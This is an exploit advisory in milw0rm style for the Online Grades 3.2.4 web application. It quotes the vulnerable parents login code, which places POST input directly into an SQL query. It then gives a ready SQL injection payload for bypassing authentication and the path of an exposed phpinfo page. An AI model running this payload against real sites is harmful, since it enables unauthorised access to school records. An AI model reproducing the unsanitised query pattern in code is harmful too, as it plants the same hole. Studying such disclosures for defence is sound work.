######################################################################################### [0x01] Informations: Script : Online Grades 3.2.4 Download : http://www.onlinegrades.org Vulnerability : Auth Bypass - Php Info Disclosure Author : x0r Contact : x0r@live.it \ andry2000@hotmail.it Website : NULL ######################################################################################### [0x02] Bug: /parents/login.php $username = $_POST['uname']; $pword = $_POST['pass']; $mysql_query = "SELECT * from PARENTS where client_id = '$username' and client_pw = '$pword';"; ######################################################################################### [0x03] Exploit: Exploit: [validemail] ' or ' 1=1-- Php Info: /includes/phpinfo.php ######################################################################################### # milw0rm.com [2009-02-03]